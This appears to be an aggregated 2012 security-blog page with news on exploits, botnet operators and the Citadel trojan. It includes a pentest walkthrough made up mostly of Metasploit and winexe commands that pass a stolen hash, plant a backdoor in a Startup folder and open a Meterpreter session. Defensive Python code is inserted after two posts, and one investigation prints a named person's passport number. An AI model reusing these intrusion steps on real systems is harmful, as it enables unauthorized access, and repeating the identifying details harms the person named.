Warnings About Windows Exploit, pcAnywhere

January 27th, 2012 No comments

Security experts have spotted drive-by malware attacks exploiting a critical security hole in Windows that Microsoft recently addressed with a software patch. Separately, Symantec is warning users of its pcAnywhere remote administration tool to either update or remove the program, citing a recent data breach at the security firm that the company said could help attackers find holes in the aging software title.

On Thursday, Trend Micro said it had encountered malware that leverages a vulnerability in the way Windows handles certain media files. This is a browse-and-get-owned flaw for Windows XP, Windows Vista, Windows Server 2003 and 2008 users, meaning these folks can infect their machines merely by browsing to a hacked or malicious site hosting a specially crafted media file. If you run Windows and have delayed installing this month’s updates, consider taking care of that now by visiting Windows Update.

Trend Micro competitor Symantec also issued a warning this week — about threats to its own software. Responding to a now widely-publicized break-in that resulted in the theft of its proprietary source code in 2006, Symantec issued a 10-page white paper with recommendations for customers still using this software. The company says fewer than 50,000 people are still using pcAnywhere, but those who are should consider applying newly-released updates, or removing the program altogether.

From that whitepaper (PDF):

With this incident pcAnywhere customers have increased risk. Malicious users with access to the source code have an increased ability to identify vulnerabilities and build new exploits. Additionally, customers that are not following general security best practices are susceptible to man-in-the-middle attacks which can reveal authentication and session information. General security best practices include endpoint, network, remote access, and physical security, as well as configuring pcAnywhere in a way that minimizes potential risks.

At this time, Symantec recommends disabling the product until Symantec releases a final set of software updates that resolve currently known vulnerability risks. For customers that require pcAnywhere for business critical purposes, it is recommended that customers understand the current risks, ensure pcAnywhere 12.5 is installed, apply all relevant patches as they are released, and follow the general security best practices discussed herein.

On Thursday, Symantec released updates to address at least three security vulnerabilities in pcAnywhere 12.5 for Windows. The company said it plans to issue additional updates for pcAnywhere 12.0, pcAnywhere 12.1 and pcAnywhere 12.5, although it didn’t say precisely when those updates would be available.

It’s generally a bad idea to leave remote administration tools like pcAnywhere always on and always accessible via the Internet. If you must use them, I’d strongly recommend limiting allowable connections to specific computer names or Internet addresses, limiting the number of consecutive logon attempts, and — if feasible — incorporating some type of token based solution.

Mr. Waledac: The Peter North of Spamming

January 26th, 2012 No comments

Microsoft on Monday named a Russian man as allegedly responsible for running the Kelihos botnet, a spam engine that infected an estimated 40,000 PCs. But closely held data seized from a huge spam affiliate program suggests that the driving force behind Kelihos is a different individual who commanded a much larger spam empire, and who is still coordinating spam campaigns for hire.

Kelihos shares a great deal of code with the infamous Waledac botnet, a far more pervasive threat that infected hundreds of thousands of computers and pumped out tens of billions of junk emails promoting shady online pharmacies. Despite the broad base of shared code between the two malware families, Microsoft classifies them as fundamentally different threats. The company used novel legal techniques to seize control over and shutter both botnets, sucker punching Waledac in early 2010 and taking out Kelihos last fall.

On Monday, Microsoft filed papers with a Virginia court stating that Kelihos was operated by Andrey N. Sabelnikov, a St. Petersburg man who once worked at Russian antivirus and security firm Agnitum. But according to the researcher who shared that intelligence with Microsoft — and confidentially with Krebs On Security weeks prior to Microsoft’s announcement — Sabelnikov is likely only a developer of Kelihos.

“It’s the same code with modifications,” said Brett Stone-Gross, a security analyst who came into possession of the Kelihos source code last year and has studied the two malware families extensively.

Rather, Stone-Gross said, the true coordinator of both Kelihos and Waledac is likely another Russian who is well known to anti-spam activists.

WHO IS SEVERA?

A variety of indicators suggest that the person behind Waledac and later Kelihos is a man named “Peter Severa” — known simply as “Severa” on underground forums. For several years running, Severa has featured in the Top 10 worst spammers list published by anti-spam activists at Spamhaus.org (he currently ranks at #5). Spamhaus alleged that Severa was the Russian partner of convicted U.S. pump-and-dump stock spammer Alan Ralsky, and indeed Peter Severa was indicted by the U.S. Justice Department in a related and ongoing spam investigation.

It turns out that the connection between Waledac and Severa is supported by data leaked in 2010 after hackers broke into the servers of pharmacy spam affiliate program SpamIt. The data also include tantalizing clues about Severa’s real identity.

In multiple instances, Severa gives his full name as “Peter North;” Peter Severa translates literally from Russian as “Peter of the North.” (The nickname may be a nod to the porn star Peter North, which would be fitting given that Peter North the spammer promoted shady pharmacies whose main seller was male enhancement drugs).

Spamdot.biz moderator Severa listing prices to rent his Waledac spam botnet.

According to SpamIt records, Severa brought in revenues of $438,000 and earned commissions of $145,000 spamming rogue online pharmacy sites over a 3-year period. He also was a moderator of Spamdot.biz (pictured at right), a vetted-members-only forum that included many of SpamIt’s top earners, as well as successful spammers/malware writers from other affiliate programs such as EvaPharmacy and Mailien.

Severa seems to have made more money renting his botnet to other spammers. For $200, vetted users could hire his botnet to send 1 million pieces of spam; junk email campaigns touting employment/money mule scams cost $300 per million, and phishing emails could be blasted out through Severa’s botnet for the bargain price of $500 per million.

Spamhaus says Severa’s real name may be Peter Levashov. The information Severa himself provided to SpamIt suggests that Spamhaus’s intelligence is not far off the mark.

Severa had his SpamIt earnings deposited into an account at WebMoney, a virtual currency popular in Russia and Eastern Europe. According to a source that has the ability to look up identity information tied to WebMoney accounts, the account was established in 2001 by someone who entered a WebMoney office and presented the Russian passport #454345544. The passport bore the name of a then 26-year-old from Moscow — Viktor Sergeevich Ivashov.

SPAMDOT SECRETS

So where are the clues suggesting that Severa ran Waledac? Krebs On Security also managed to secure a copy of the Spamdot.biz forum, including the private messages for all of its users. On August 27, 2009, Severa sent a private message to a Spamdot.biz user named “ip-server.” Those communications show that the latter had sold Severa access to so-called “bulletproof hosting” services that would stand up to repeated abuse claims from other ISPs. The messages indicate that Severa transacted with ip-server to purchase dedicated servers used to control the operations of the Waledac botnet.

In the private message pictured in the screen shot to the left, Severa writes (translated from Russian):

“Hello, writing to your ICQ, you are not responding.  One of the servers has been down for 5 hours. The one ending on .171.  What’s the problem, is it coming up or not, and when?”

ssh 193.27.246.171
ssh: connect to host 193.27.246.171 port 22: No route to host”

Ip-server must have resolved the outage, because the server that Severa was complaining about — 193.27.246.171 — would be flagged a day later by malware analysts, and tagged as a control server for the Waledac botnet.

There are clues that suggest a relationship between Severa and Kelihos that go beyond similarities in the code that powers the two botnets. Last summer, prior to Microsoft’s takedown of Kelihos, I wrote about another venture that Severa widely advertised on hacker forums: “Sevantivir,” an affiliate program that rewarded hackers for tricking people into installing and ultimately paying for fake antivirus software.

In that story, I cited research by French malware investigator and blogger Steven “Xylitol” K, who found that the installer program that Severa was giving to affiliates seeded infected PCs with both fake antivirus and a copy of Kelihos. From that story:

“Steven discovered that the malicious installer that Sevantivir affiliates were asked to distribute was designed to download two files. One was a fake AV program called Security Shield. The other was a spambot that blasts junk email pimping Canadian Pharmacy/Glavmed pill sites. The spambot is detected by Microsoft’s antivirus software as Win32.Kelihos.b. According to Microsoft, Kelihos.b shares large portions of its code with the Waledac worm, an infamous worm that for several years was synonymous with Canadian Pharmacy spam.”

It’s not clear what botnet infrastructure he is using now, but Severa is still the spam service administrator on several underground forums, pimping his spam services, remarkably under most of the same prices he offered them for in 2008.

Contacted via instant message and presented with the evidence, Severa denied everything, saying he only did small opt-in mailings, had never used a botnet, and had been out of the business for years. When pressed about his fake antivirus affiliate program, Severa said he didn’t realize his antivirus program was fake, and that he didn’t know anyone named Sabelnikov, or even Ralsky. When presented with the screen shot below — which shows Severa complaining on Spamdot about how his broker ran away and that he was faced to find a new sponsor for spamming penny stocks just days after Ralsky’s arrest in Jan. 2008 — Severa said someone else must have been using his Spamdot account.

“The truth is that some people sharing servers, spamdot account and some other forum accounts [in] those years,” he explained. He gave the same reply when asked about the screen shot showing his renting the server used to control Waledac.

Kelihos may not be completely gone. Stone-Gross said he recently uncovered a malware sample that appears to be another installer for Kelihos.

“The guys running these botnets are making lots of money,” Stone-Gross said. “They’re not just going to sit back and say, ‘Oh no, they took down our botnet, let’s give up on our business.’ They’ll use pay-per-install affiliate programs to reinfect more machines and bring the botnet right back up.”

Severa writes: "Because of issues with Ralsky my broker ran away along with two other people who could supply stocks. I am forced to look for new contacts. So — I AM LOOKING FOR STOCK SPONSOR"

"Digital Forensic SIFTing: Colorized Super Timeline Template for Log2timeline Output Files"

January 25th, 2012 No comments

Last Month at the SANS360, I promised the release of the Timeline Template to be used to automatically colorize your timelines. Review on Timeline Creation: 1. Mounting Evidence Files 2. Automated Timeline Creation 3. Targeted Timeline Creation TIMELINE CREATION CHEAT SHEET The Timeline …


Microsoft: Worm Operator Worked at Antivirus Firm

January 24th, 2012 No comments

In a surprise filing made late Monday, Microsoft said a former technical expert at a Russian antivirus firm was the person responsible for operating the Kelihos botnet, a global spam machine that Microsoft dismantled in a coordinated takedown last year.

Andrey Sabelnikov

In a post to the Official Microsoft Blog, the company identified 31-year-old Andrey N. Sabelnikov of St. Petersburg, Russia as responsible for the operations of the botnet. Microsoft’s amended complaint (PDF) filed with the U.S. District Court for the Eastern District of Virginia states that Sabelnikov worked as a software engineer and project manager at a company that provided firewall, antivirus and security software.

Microsoft doesn’t specify where Sabelnikov worked, but according to Sabelnikov’s LinkedIn page, from 2005 to 2007 he was a senior system developer and project manager for Agnitum, a Russian antivirus firm based in St. Petersburg. One of the company’s most popular products is Outpost, a free firewall program. Sabelnikov’s profile says he most recently worked for a firm called Teknavo, which makes software for companies in the financial services sector.

A source close to the investigation told Krebs On Security that Sabelnikov’s alleged role was discovered after a security researcher obtained a copy of the source code to Kelihos. The researcher noticed that the source contained debug code that downloaded a Kelihos malware installer from the domain sabelnikov.net, a photography site registered to Sabelnikov’s name. That site currently links to Sabelnikov’s profile page at Russian social networking site Vkontakte.ru, which includes the same pictures found in the LinkedIn profile mentioned above.

Microsoft doesn’t mention the source code discovery in its amended complaint, but it does reference the availability of new evidence in naming Sabelnikov. The company said it also had cooperation from the original defendants in the case — Dominique Alexander Piatti and the dotFREE Group, which owned the domains allegedly used to control the botnet.

Update, Jan. 27 9:38 a.m. ET: Sabelnikov on Thursday posted a response on his blog denying Microsoft’s allegations, saying he had never participated in the management of botnets and any other similar programs. Sabelnikov also stated that he has just returned from a business trip to the United States earlier this month. Interestingly, he says he arrived in the U.S. on Jan. 21, and stayed for two days — meaning he left either the same day or a day after Microsoft filed its brief with the court.

Also on Thursday, I published a follow-up investigation which suggests that Kelihos and its predecessor Waledac were almost certainly the work of a well-known spammer named Peter Severa.

psexec fail? upload and exec instead

January 23rd, 2012 No comments

I ended up having to use the smb/upload_file module on a pentest.  I was able to get the local admin hashes but for some reason the psexec module wouldn’t get code execution, it would act like it would work but wasn’t.  So we decided to push a binary, use winexe that was modified to pass the hash to exec the binary as needed.  It went something like this…

##################################################
# add a route to the 10.x network thru session 1
##################################################

msf  exploit(handler) > route add 10.0.0.0 255.255.255.0 1
[*] Route added

#######################################################
# psexec wouldn't work. AV eating metsvc most likely…
# used smb/upload_file to place a binary on the box
#######################################################
msf  exploit(handler) > use auxiliary/admin/smb/upload_file
msf auxiliary(upload_file) > info

    Name: SMB File Upload Utility
    Module: auxiliary/admin/smb/upload_file
    Version: 10394
    License: Metasploit Framework License (BSD)
    Rank: Normal

Provided by:
  hdm

Basic options:

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  LPATH                      yes       The path of the local file to upload
  RHOST                      yes       The target address
  RPATH                      yes       The name of the remote file relative to the share
  RPORT     445              yes       Set the SMB service port
  SMBSHARE  C$               yes       The name of a writeable share on the server

Description:
  This module uploads a file to a target share and path. The only
  reason to use this module is if your existing SMB client is not able
  to support the features of the Metasploit Framework that you need,
  like pass-the-hash authentication.

msf  auxiliary(upload_file) > set SMBUser Administrator
SMBUser => Administrator
msf  auxiliary(upload_file) > set SMBPass aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
SMBPass => aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
msf auxiliary(upload_file) > set RHOST 1.2.3.4
RHOST => 1.2.3.4
msf auxiliary(upload_file) > set LPATH /home/chris/msf3/msf_backdoor.exe
LPATH => /home/chris/msf3/msf_backdoor.exe
msf auxiliary(upload_file) > set RPATH "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\msf_backdoor.exe"
RPATH => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe
msf auxiliary(upload_file) > run
[*] Read 13616 bytes from /home/chris/msf3/msf_backdoor.exe…
[*] Connecting to the server…
[*] Mounting the remote share \\1.2.3.4\C$’…
[*] Trying to upload Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe…
[*] The file has been uploaded to Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe…
[*] Auxiliary module execution completed

################################################
# Set up a portforward to talk to hosts via SMB
################################################

meterpreter > portfwd add -l 445 -p 445 -r 1.2.3.4
[*] Local TCP relay created: 0.0.0.0:445 <-> 1.2.3.4:445

#####################################################################
# Use winexe with pass the hash to get cmd shell and run the binary
#####################################################################

user@ubuntu:~/Desktop/winexe-hash$ export SMBHASH=aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
user@ubuntu:~/Desktop/winexe-hash$ ./winexe -U administrator //1.2.3.4 "cmd"
Password for [WORKGROUP\administrator]:
HASH PASS: Substituting user supplied NTLM HASH…
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : inside.company.com
        IP Address. . . . . . . . . . . . : 1.2.3.4
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 1.2.3.254

C:\WINDOWS\system32>
C:\Documents and Settings\All Users\Start Menu\Programs\Startup>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0007-B088

 Directory of C:\Documents and Settings\All Users\Start Menu\Programs\Startup

01/13/2012  03:55 PM             .
01/13/2012  03:55 PM             ..
01/13/2012  03:55 PM            13,616 msf_backdoor.exe
               1 File(s)         13,616 bytes
               2 Dir(s)  241,661,345,792 bytes free

C:\Documents and Settings\All Users\Start Menu\Programs\Startup>msf_backdoor.exe
msf_backdoor.exe

C:\Documents and Settings\All Users\Start Menu\Programs\Startup>

[*] 5.5.5.5:4889 Request received for /INITM…
[*] 5.5.5.5:4889 Staging connection for target /INITM received…
[*] Patched transport at offset 486516…
[*] Patched URL at offset 486248…
[*] Patched Expiration Timeout at offset 641856…
[*] Patched Communication Timeout at offset 641860…
[*] Meterpreter session 5 opened (5.5.5.5:443 -> 6.6.6.6:4889) at Wed Jan 18 22:02:03 +0000 2012
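The defender-side counterpart to the upload step in the session above, added here and not part of the original post: the payload landed in the All Users Startup folder through the C$ admin share, which Windows Security event 5145 (detailed file share auditing, assumed enabled) records with ShareName, RelativeTargetName and AccessMask. The key=value export format and the sample events are constructed.

```python
"""Flag writes into the all-users Startup folder that arrive over an
administrative SMB share, from Windows Security event 5145 records.

Added example, not code from the original post. Assumes "Audit Detailed File
Share" is enabled and that events are exported one per line as Key=Value
pairs; the sample events below are constructed.
"""
import re
from dataclasses import dataclass

# Startup folders on XP/2003 (the layout in the post) and on Vista and later
# (assumed), matched case-insensitively with either slash style.
STARTUP_FOLDERS = (
    r"documents and settings\all users\start menu\programs\startup",
    r"programdata\microsoft\windows\start menu\programs\startup",
)
# FILE_WRITE_DATA | FILE_APPEND_DATA bits of the 5145 AccessMask
WRITE_BITS = 0x2 | 0x4


@dataclass
class Finding:
    source_ip: str
    user: str
    share: str
    target: str


def parse_event(line):
    """Parse one 'Key=Value Key="Value with spaces"' line into a dict."""
    pairs = re.findall(r'(\w+)=("[^"]*"|\S+)', line)
    return {key: value.strip('"') for key, value in pairs}


def is_admin_share(share):
    """Administrative shares (C$, ADMIN$, ...) end in $ in 5145 ShareName values."""
    return share.rstrip("\\").upper().endswith("$")


def is_startup_path(rel_path):
    """True when the share-relative target lies inside a Startup folder."""
    normalized = rel_path.replace("/", "\\").lower()
    return any(folder in normalized for folder in STARTUP_FOLDERS)


def find_startup_drops(lines):
    """Return one Finding per 5145 event that writes into Startup via an admin share."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "5145":
            continue
        try:
            mask = int(ev.get("AccessMask", "0"), 16)
        except ValueError:
            continue  # malformed mask: skip rather than guess
        if not mask & WRITE_BITS:
            continue
        share = ev.get("ShareName", "")
        target = ev.get("RelativeTargetName", "")
        if is_admin_share(share) and is_startup_path(target):
            findings.append(Finding(ev.get("IpAddress", "?"),
                                    ev.get("SubjectUserName", "?"), share, target))
    return findings


# Constructed sample events: only the first one should be flagged.
SAMPLE_EVENTS = [
    r'EventID=5145 SubjectUserName=Administrator IpAddress=10.0.0.5 ShareName=\\*\C$ '
    r'RelativeTargetName="Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe" AccessMask=0x2',
    # read-only access to the same folder
    r'EventID=5145 SubjectUserName=Administrator IpAddress=10.0.0.5 ShareName=\\*\C$ '
    r'RelativeTargetName="Documents and Settings\All Users\Start Menu\Programs\Startup" AccessMask=0x1',
    # write into a path that is not a Startup folder
    r'EventID=5145 SubjectUserName=svc_backup IpAddress=10.0.0.9 ShareName=\\*\ADMIN$ '
    r'RelativeTargetName="Temp\backup.log" AccessMask=0x2',
    # write into Startup through an ordinary (non-admin) share
    r'EventID=5145 SubjectUserName=jdoe IpAddress=10.0.0.7 ShareName=\\*\Public '
    r'RelativeTargetName="ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\x.lnk" AccessMask=0x2',
    # a different share event (5140), not a file-level access record
    r'EventID=5140 SubjectUserName=Administrator IpAddress=10.0.0.5 ShareName=\\*\C$ AccessMask=0x2',
]

if __name__ == "__main__":
    for f in find_startup_drops(SAMPLE_EVENTS):
        print(f"{f.source_ip} as {f.user} wrote {f.target} via {f.share}")
```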


‘Citadel’ Trojan Touts Trouble-Ticket System

January 23rd, 2012 No comments

Underground hacker forums are full of complaints from users angry that a developer of some popular banking Trojan or bot program has stopped supporting his product, stranding buyers with buggy botnets. Now, the proprietors of a new ZeuS Trojan variant are marketing their malware as a social network that lets customers file bug reports, suggest and vote on new features in upcoming versions, and track trouble tickets that can be worked on by the developers and fellow users alike.

A screenshot of the Citadel botnet panel.

The ZeuS offshoot, dubbed Citadel and advertised on several members-only hacker forums, is another software-as-a-service malware development. Its target audience? Those frustrated with virus writers who decide that coding their next creation is more lucrative and interesting than supporting current clients.

“It’s no secret that the products in our field — without support from the developers — result in a piece of junk on your hard drive. Therefore, the product should be improved according to the wishes of our customers,” Citadel’s developers claim in an online posting. “One problem is that you have probably experienced developers who ignore your instant messages, because there are many customers but there is only one developer.”

In the following excerpt, taken from a full description of Citadel’s innovations, the developers of this malware strain describe its defining feature as a social networking platform for malware users that is made available through a Web-based portal created by the malware itself.

“We have created for you a special system — call it the social network for our customers. Citadel CRM Store allows you to take part in product development in the following ways:

- Report bugs and other errors in software. All tickets are looked at by technical support you will receive a timely response to your questions. No more trying to reach the author via ICQ or Jabber.

- Each client has the right to create an unlimited number of applications within the system. Requests can contain suggestions on a new module or improvements of existing module. Such requests can be public or private.

- Each client has a right to vote on new ideas suggested by other members and offer his/her price for development of the enhancement/module. The decision is made by the developers on whether to go forward with certain enhancement or new module depending on the voting results.

- Each client has the right to comment on any application and talk to any member. Now it is going to be interesting for you to find partners and like-minded people and also to take active parts in discussions with the developers.

- You can see all stages of module development, if it is approved other members. We update the status and time to completion.

- You may pay a deposit, if module is approved (50%). After the deposit is paid by the members, the project starts moving forward, so that the money is paid directly to coders and there will be no laziness or inaction. Everything is clear: every stage of development is thoroughly shown.

- Easy jabber [instant message] notification of new member or developer comments, or the availability of new custom applications.

The Citadel store lets users file and track bug reports, and request and vote on new features.

Citadel may be the first notable progeny of ZeuS since the ZeuS source code was leaked online last year. The authors claim that it includes a number of bug fixes for the most recent ZeuS version, including full support for grabbing credentials from victims using Google Chrome. Also bundled with this update is a component that can record and transmit videos of the victim’s screen activity.

The basic Citadel package — a bot builder and botnet administration panel — retails for $2,399 + a $125 monthly “rent,” but some of its most innovative features are sold as a la carte add-ons. Among those is a $395 software module that allows botmasters to sign up for a service which automatically updates the bot malware to evade the last antivirus signatures. The updates are deployed via a separate Jabber instant message bot, and each update costs an extra $15.

Citadel also boasts a feature that hints at its creator’s location(s). According to the authors, if the malware detects that the victim’s machine is using a Russian or Ukrainian keyboard, it will shut itself down. This feature is almost certainly a hedge to keep the developers out of trouble: Authorities in those regions are far less likely to pursue the Trojan’s creators if there are no local victims.

The Citadel bot builder.

It will be interesting to see if these malware developers hold true to their word. The growth of a more real-time, user-driven and crowdsourced malicious software market would be a truly disturbing innovation. For now, the miscreants behind Citadel appear upbeat about their chances of ushering in such a reality.

“It’s very interesting for us to work with our clients,” they wrote in an online forum posting. “A lot of authors write in forums that they ‘support the product,’ but at the end the updates only come out once every three months or the author disappears forever. Problem is in author’s motivation. You support us, we support you. It is easy.”

The GSD Curmudgeon says “Get off my Yard you Dang Kids!”

January 23rd, 2012 No comments

Sigh. I’m getting old.

I recently read a post at ReadWriteWeb by Scott Fulton, III: Mozilla’s Plan for Keeping Firefox Relevant in a Post-Browser Web.

That day I became dangerously close to becoming the old technologist guy equivalent of the “You kids get off my lawn!” guy we all probably know.

What is Mozilla doing to my beloved Firefox of the near and dear “future”?

  • HTML5 runtime functionally support (for driving in-browser, non system proprietary, web-apps).
  • Extending cloud-based services.
  • An on-line identity management system called “BrowserID”. (How it works)
  • and more stuff imagined and planned.

That left me grumbly. Then John Paul Titlow at ReadWriteWeb posted this: Mozilla: We’re About to Grab More Data About You, But Here’s How We’ll Keep It Safe.

Mozilla has some big plans up its sleeve in 2012. The non-profit open source foundation is planning some features for its Firefox Web browser and beyond that will require greater access to user data. In a blog post, the organization explains exactly how it intends to use and handle that data. In short, very carefully.

The blog post John Paul references is up at Mozilla Privacy Blog: Mozilla to Offer New User-Centric Services in 2012.

While I recognize and appreciate the very challenging work that browser developers have (not just at Mozilla), I think I’m grumbly for two primary reasons here with Mozilla.

First, I was a very early adopter of Firefox. It was quicker than IE. It was slimmer (memory and feature bloat) than IE. It was more secure than IE. And I could plug all kinds of things into it (Add-Ons/Extensions) to customize it with only those features and capabilities that helped make my experience on the Web better. If I didn’t need it, I didn’t install it and thus kept the Firefox browser lean and mean.

I really do “get it” with the coming exciting wave of “web-based apps” and running them in your browser and the security it will now bring (think JavaScript/Flash). It’s the next “big” evolutionary shift for the Internet. Really. Who of us really still think of the Internet as being just a super-large reference library and world-wide town-square/market anymore? It’s now a world-wide commercial mall and entertainment center. Really. Oh sure, you can still go down that wing none of the hip kids hang out at and find the pubs where the old-timers hang out, a few plain coffee-bars where the wanna-be journalist “bloggers” hang out and trade stories of yore, and maybe go into that virtual bookstore of arcane knowledge and technical minutia that some of us still love. But really. None of the cool companies and consumers come down this way. They demand different things. Better things. A new paradigm of interaction and operation.

Sigh.

So the browser needs to change to keep up. Bigger, more embedded features. Probably faster. Probably louder too with base-boost and kickers. Hopefully the security alarm on it will be better too.

Secondly, my bones ache every time a new ID management system comes out that gets closer to being a cloud-based requirement. I know, it’s for my own good they’re doing it. Really. I’m so much safer having more and more of my user data off-loaded to the Webs and Clouds. Clearly the higher and higher it goes away from me the safer and safer and harder and harder it must be for the underground dwellers to grab it. Right? What? Oh, I have to just “trust” everyone “out-there” with my user data and All-In-One credentials and stuff. I’m sure everyone will be honorable and diligent in keeping my account and passwords and user data safe and secure. Nobody ever gets their customer’s account/password information lost to hackers, or on a laptop, or on a USB stick anymore, or via a network traffic hack. Right? That was just in the “old-days”. These new solutions are really, really safer.

I get it. I do. And I appreciate everyone working so hard to keep Firefox and my web experience so much more safe, more secure, and more powerful than ever before. I appreciate modern AC over running a fan past a block of ice to cool my house. Really. And who doesn’t like the convenience of a cellular smart-phone over a plain-old copper analog line service wired into your house?

My browser is growing up, and the world it is living in is changing as fast as it is.

Sigh.

I still use (and probably will) Firefox as my personal “production” web-browser of choice. It works for me and my way of being productive.  That said, when I’m surfing the web, give me Chrome. I guess I have to still drive the daily commuter into work and back, but yeah, on the weekends I like to pull out the latest sports car for tooling around the highways and byways and back roads.

You know, I was a very early adopter of Chrome. It was quicker than Firefox. It was slimmer (memory and feature bloat) than Firefox. It was more secure than Firefox. And I could plug all kinds of things into it (Add-Ons/Extensions) to customize it with only those features and capabilities that helped make my experience on the Web better. If I didn’t need it, I didn’t install it and thus kept the Chrome browser lean and mean. In fact, I hear from the Google Chrome Blog that Chrome is about to get more Speed and Security with pre-rendering of pages and enhanced URL and file-download checking. What’s not to like about that!

I gotta admit, high-school senior (these kids again!) Danny Stieben’s timely post at MakeUseOf blog probably sums it up right: Why It Eventually Won’t Matter What Browser You Use [Opinion].

It won’t. Honestly. It just won’t. Time to face the music and admit I’ve got to adopt the new (browser/web) core “technology” design model and landscape or I’ll become irrelevant and end up spending the rest of my days in that dilapidated and decaying wing of the New Web Mall hanging out with the other curmudgeons and making fun of those really dorky guys and gals still using AOL web-mails, web portal home-pages with their IE 5/6 and Firefox 3 web-browsers. Seriously? Who uses those anymore?!! Get a clue.

Here. Spin a wheel and take a pick. Take one. Use one. Just don’t become friends or companions. Someone’s bound to change and the relationship will sour, and there will be a new favorite.

The GSD Curmudgeon ends with these moving and inspiring words of wisdom and perspective on the whole thing.

Great Motivational Speech – It Just Doesn’t Matter – YouTube

Ok…soap box away. We will now return to regular GSD programming.

–Claus V.

Categories: Forensic

IOS: Let Me Truncate That Password For You…

January 23rd, 2012

When I configured this Cisco router (IOS version 15.0(1)M5) for dynamic DNS, it failed to properly update its public IP address on the dynamic DNS site. Turning on debugging (debug ip ddns update) revealed an authentication issue:

*Jan 20 22:53:55.591: HTTPDNSUPD: DATA START badauth

A simple test confirmed what I suspected: IOS truncates the password. It can’t be longer than 15 characters.

Here’s the config of my test, with username test and a 20-character password:

And here’s what the web server receives:

The password received by the web server is 0123456789abcde. In other words, IOS has truncated the password to its first 15 characters and included only those in the headers of the HTTP(S) GET request that updates the dynamic DNS record.

It’s possible that the username also gets truncated to 15 characters, however I’ve not tested this.

The Cisco bug ID is CSCtx50249.
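As an added illustration (not code from the original post), here is a small Python check that an operator of a dynamic DNS update endpoint could use to tell a truncated password apart from a plainly wrong one, so that a "badauth" caused by a client-side limit like the one above is recognizable. It assumes the update is a DynDNS-style GET carrying HTTP Basic credentials; the username, password, hostname and IP values are constructed.

```python
import base64

# Constructed values (not from the post): a 20-character password, and the 15-character limit the post observed on IOS.
CONFIGURED_USER = "test"
CONFIGURED_PASSWORD = "0123456789abcdefghij"
IOS_PASSWORD_LIMIT = 15

def parse_basic_auth(header_value):
    """Decode an 'Authorization: Basic <base64>' value into (user, password).
    Returns None when the value is not well-formed Basic auth."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True).decode("latin-1")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    user, sep, password = raw.partition(":")
    return (user, password) if sep else None

def diagnose_update(request_lines, expected_user, expected_password):
    """Classify the credential in a DDNS update: 'ok', 'truncated' (only a proper
    prefix of the password arrived, as the IOS bug does), 'badauth' or 'missing'."""
    creds = None
    for line in request_lines:
        name, _, value = line.partition(":")
        if name.strip().lower() == "authorization":
            creds = parse_basic_auth(value)
            break
    if creds is None:
        return "missing"
    user, password = creds
    if user != expected_user:
        return "badauth"
    if password == expected_password:
        return "ok"
    if password and len(password) < len(expected_password) \
            and expected_password.startswith(password):
        return "truncated"
    return "badauth"

def build_update_request(user, password):
    """A DynDNS-style update GET as a client would send it (assumption: the
    credential travels as HTTP Basic auth). Hostname and IP are constructed."""
    token = base64.b64encode(f"{user}:{password}".encode("latin-1")).decode("ascii")
    return [
        "GET /nic/update?hostname=router.example&myip=192.0.2.10 HTTP/1.1",
        "Host: ddns.example",
        f"Authorization: Basic {token}",
    ]

if __name__ == "__main__":
    # What the router effectively sends: only the first 15 characters of the password.
    sent = build_update_request(CONFIGURED_USER, CONFIGURED_PASSWORD[:IOS_PASSWORD_LIMIT])
    print(diagnose_update(sent, CONFIGURED_USER, CONFIGURED_PASSWORD))  # truncated
```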

Categories: Forensic

On The Usefulness of a Pleasant Desk

January 22nd, 2012

I can’t believe I’ve been blogging now (fairly) consistently since 2005. I’ve gone from a peak posting rate of 311 posts in 2007 down to a low of just 40 posts last year in 2011.

Finding the time to blog has grown more and more challenging and I hope the quality and depth of many of my posts has grown over the years as well.

The last two years in particular have been a personal frustration as I have attempted to grow more “present” with my family and community while dealing with the tremendous workload presented in my “real” job that has meant longer hours, later hours, and technical challenges that have conspired to keep my technical processing brain-core on overdrive.

All that said, the biggest problem I had, however, hasn’t been a lack of inspiration, or of time, or of material.

I seriously believe it was the lack of a good desk and by extension, a good workspace.

See, from 2006-2009 a good part of my primary blogging hardware was based on desktop computers at home. First an old Gateway and later a small-form-factor barebones home-build kit.  Both these systems were kept in a nice desk that was located in our library/laundry room.  So I could hole up in the space, have few interruptions, and focus on writing, and blogging, and blogging. Lots of productivity.

In 2006 Lavie bought our first laptop. Then in 2007 Lavie won a Gateway laptop and it became her new laptop and the first one became a backup family pc. Then in 2009 Lavie picked up a larger laptop for herself and I took over the Gateway laptop as a secondary system while Alvis took over Lavie’s first one. Though I continued to patch and upgrade the SFF desktop pc I used, the Gateway laptop really became my primary home computing device and blogging platform. And in late 2010 I finally obtained my own “dream” notebook.

I sincerely believe the shift from using a desktop pc (at a desk) to a laptop (wherever) is what led to the biggest hit on my blogging production.

When I sit at a desk I have a productive mindset. When I’m in one of the chairs or couch in our living room I can blog, but it doesn’t feel as natural as just “couch-surfing” the web. I find it hard to build and maintain a writing rhythm if I’m anywhere but in front of a desk.

Since the girls REALLY wanted me to be more present with them and not hidden off in our library area, and I had a laptop, it was very seldom that I found myself in our study at my desk–and in a productive blogging mindset.

I’ve been trying to find a solution to the problem for some time. Unfortunately, the desk in the library while not large, just didn’t seem to lend itself to either our living room décor or function. So I’ve just coped, and the blogging rate has suffered.

